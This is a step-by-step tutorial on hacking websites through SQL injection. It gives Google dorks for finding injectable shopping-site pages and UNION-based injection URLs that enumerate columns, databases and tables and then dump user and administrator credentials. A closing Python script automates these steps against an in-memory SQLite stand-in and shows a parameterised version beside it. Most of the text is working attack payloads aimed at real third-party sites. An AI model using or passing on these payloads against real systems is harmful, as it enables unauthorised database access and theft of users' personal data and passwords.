How To Hack A Website Using SQL Injection - A Step By Step Tutorial
SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed, and is thereby unexpectedly executed as part of a query. It is an instance of a more general class of code injection vulnerabilities. SQL injection attacks are also known as SQL insertion attacks.
Step-By-Step Tutorial For SQL Injection
Step 1: Find a website that is vulnerable to the attack. This is the first step in SQLi and, as in every other hack, it is the most time-consuming one. Once you get through this, the rest is a cakewalk. So let us see what kind of pages are vulnerable to this attack. We are providing you with a few dorks (Google search strings that find pages which pass a database id in the URL, the pattern that is most often injectable).
Dorks:
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
And you can also write your own: any URL that hands an id-like parameter straight to a script (for example something.php?id=) follows the same pattern.
How to check if a website is vulnerable to this attack?
Once you execute the dorks and get the search results, pick a URL such as
http://www.website.com/index.php?catid=1
Add an apostrophe (') at the end of the URL, so that it looks like
http://www.website.com/index.php?catid=1'
The stray quote breaks the literal inside the query. If the page returns an SQL error, or changes visibly (blank page, missing content), the parameter is very likely injectable. If it loads exactly as before, the input is probably escaped or validated, or errors are simply not displayed (the site may still be blind-injectable, but that is beyond this tutorial); leave the page and move on to the next site in the search results.
Typical errors you'll get after appending the apostrophe are PHP warnings from the old mysql_* functions, which complain when the query did not return a valid result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource
Warning: mysql_result(): supplied argument is not a valid MySQL result resource
or the raw MySQL message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ...
Step 2: Once you find a vulnerable site, you need to enumerate the number of columns in the query and which of those columns are displayed on the page.
Append an ORDER BY clause to the URL.
eg. http://www.website.com/index.php?catid=1 order by 1
Keep increasing the number after ORDER BY until you get an error (MySQL reports Unknown column 'N' in 'order clause' once N exceeds the number of columns selected). The highest number that does not produce an error is the number of columns in the query (not of the table: it is the SELECT list that matters). Now to find out which of those columns are displayed:
Append a UNION SELECT with that many numbered placeholders, and put a minus sign in front of the number after catid= so that the original query matches no row and only the UNION row is rendered. (A UNION is accepted only when both SELECTs have the same number of columns, which is why the count from the previous step matters.)
Say from the step above you found that the query has 6 columns.
Eg. http://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6
The numbers that show up on the page mark the columns whose contents are rendered. Say we get 2, 3 and 4 as the result. We will inject our SQL expressions into one of these columns.
Step 3: Enumerating the MySQL version
We'll use the MySQL system variable @@version (the function version() works too) to get the version of the database server. It has to be placed in one of the displayed columns; say we use column 2.
eg. http://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6
The version string appears where the number 2 was rendered. If it starts with 5 or higher, you are good to go: the information_schema database used in the next step exists only from MySQL 5.0 on. If it is lower, move on to another site.
Step 4: Exploit
To Get List Of Databases:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
The result displays a list of the databases on the server that the application's database account can see. From here on, we'll write down the results we got from our test.
Result: information_schema, vrk_mlm
To know the current database in use:
http://www.website.com/index.php?catid=-1 union select 1,database(),3,4,5,6--
Result: vrk_mlm
To get the current user:
http://www.website.com/index.php?catid=-1 union select 1,user(),3,4,5,6--
Result: vrk_4mlm@localhost
To get the tables:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll concentrate our attack on the users table.
To get the columns:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
(Adding and table_name=0x7573657273, the hex encoding of the string 'users', restricts the list to that one table without needing quote characters, which the site may escape.)
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_toids,no_of_direct_reterals,credits,position,email_id,password,editied_on,last_login,created_on,chain_number,phone,address
Looking at the columns and the order of the tables (administrator, category, product, users), we can conclude that the columns starting from id,incredible_id belong to the users table, which is the one we are interested in.
Extract information:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a,email_id,0x3a,password),3,4,5,6 from vrk_mlm.users--
0x3a is the hex encoding of ':' and is used as a field separator so that no quote characters are needed; group_concat joins the rows with commas. Now you will get every user's details and password. The site login lives in the administrator table seen above, so the same query against vrk_mlm.administrator with user_name,0x3a,password returns the admin username and password (which may be stored as a hash rather than in the clear).
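The whole procedure above, steps 1 through 4, driven from a script, as an added example that is not part of the original tutorial. It runs offline against an in-memory SQLite database standing in for the MySQL site, so the MySQL-specific names are swapped for their SQLite equivalents (sqlite_version() for @@version, sqlite_master for information_schema.tables, char() for the 0x hex literals, and group_concat(expr, sep) because SQLite's second argument is the separator); the schema, the rows and the page template that renders only three of the six columns are constructed for the example. The vulnerable page builds its query by string concatenation exactly as the tutorial assumes, and the hardened page beside it shows why an integer check plus a bound parameter stops every step.

```python
import re
import sqlite3

# Constructed stand-in for the site's database. Table and column names follow
# the tutorial's vrk_mlm example; the rows are invented for this example.
SCHEMA = """
CREATE TABLE category (catID INTEGER, catName TEXT);
CREATE TABLE product (prodId INTEGER, catID INTEGER, prodName TEXT,
                      prodDesc TEXT, prodKeyword TEXT, prodPrice REAL);
CREATE TABLE users (id INTEGER, incredible_id TEXT, f_name TEXT, l_name TEXT,
                    email_id TEXT, password TEXT);
INSERT INTO category VALUES (1, 'books');
INSERT INTO product VALUES (10, 1, 'Widget', 'A widget', 'widget', 9.99);
INSERT INTO users VALUES (1, 'INC001', 'Alice', 'Admin', 'alice@example.com',
                          '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'INC002', 'Bob', 'User', 'bob@example.com',
                          'e10adc3949ba59abbe56e057f20f883e');
"""
SELECT = ("SELECT prodId, prodName, prodDesc, prodKeyword, prodPrice, catID "
          "FROM product WHERE catID=")
# Digit-free template so numeric UNION markers are unambiguous; only columns
# 2, 3 and 5 of the query (name, description, price) are rendered.
TEMPLATE = "<b>%s</b><p>%s</p><i>%s</i>"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def render(rows):
    body = "".join(TEMPLATE % (r[1], r[2], r[4]) for r in rows)
    return "<html><body>%s</body></html>" % (body or "<p>No such category</p>")


def vulnerable_page(conn, catid):
    """index.php?catid=... as the tutorial assumes it: the raw parameter is
    concatenated into the SQL text, so everything after the number is SQL."""
    try:
        return {"html": render(conn.execute(SELECT + catid).fetchall()), "error": None}
    except sqlite3.Error as e:
        # Emulate a PHP site with display_errors on, the origin of the
        # "Warning: mysql_fetch_array()" signature the tutorial looks for.
        return {"html": "<html><body>Warning: mysql_fetch_array(): %s</body></html>" % e,
                "error": str(e)}


def safe_page(conn, catid):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter so the database never parses it as SQL."""
    if not re.fullmatch(r"\d+", catid):
        return {"html": render([]), "error": None}
    rows = conn.execute(SELECT + "?", (int(catid),)).fetchall()
    return {"html": render(rows), "error": None}


# Attacker side: the tutorial's steps 1-4 as functions.
def is_injectable(page, conn):
    """Step 1: append an apostrophe and look for a database error signature."""
    return "Warning: mysql_" in page(conn, "1'")["html"]


def count_columns(page, conn, limit=20):
    """Step 2: ORDER BY n until the server complains; the last n that worked is
    the number of columns in the original SELECT."""
    n = 0
    for i in range(1, limit + 1):
        if page(conn, "1 order by %d" % i)["error"]:
            break
        n = i
    return n


def find_visible_columns(page, conn, ncols):
    """Step 2, continued: a negative id empties the genuine result so the UNION
    row is the only one rendered; the markers that appear are the shown columns."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(conn, "-1 union select " + markers)["html"]
    return [i for i in range(1, ncols + 1) if re.search(r"(?<!\d)%d(?!\d)" % i, html)]


def extract(page, conn, ncols, col, expression, from_clause=""):
    """Steps 3-4: put an expression in a displayed column, pad the rest with
    numbers, and read the answer back out of the rendered page."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[col - 1] = expression
    return page(conn, "-1 union select %s %s" % (",".join(parts), from_clause))["html"]


def run_attack(page, conn):
    """Drive the whole procedure; None when step 1 already fails."""
    if not is_injectable(page, conn):
        return None
    ncols = count_columns(page, conn)
    col = find_visible_columns(page, conn, ncols)[0]
    # char(58) plays the role of the tutorial's 0x3a separator and
    # char(116,97,98,108,101) spells 'table' without quote characters.
    return {
        "version": extract(page, conn, ncols, col, "sqlite_version()"),
        "tables": extract(page, conn, ncols, col, "group_concat(name, char(44))",
                          "from sqlite_master where type=char(116,97,98,108,101)"),
        "users": extract(page, conn, ncols, col,
                         "group_concat(id || char(58) || email_id || char(58) || password, char(44))",
                         "from users"),
    }


if __name__ == "__main__":
    db = open_db()
    print(run_attack(vulnerable_page, db))  # tables and credentials leak
    print(run_attack(safe_page, db))        # None: the apostrophe test fails
```

The marker search uses word-boundary-like lookarounds because a bare `"2" in html` would match digits inside real page content; in practice people use distinctive strings rather than plain numbers for the same reason. On a MySQL target the three expressions in run_attack become @@version, group_concat(table_name) from information_schema.tables where table_schema=database(), and group_concat(id,0x3a,email_id,0x3a,password) from users, exactly as in the tutorial.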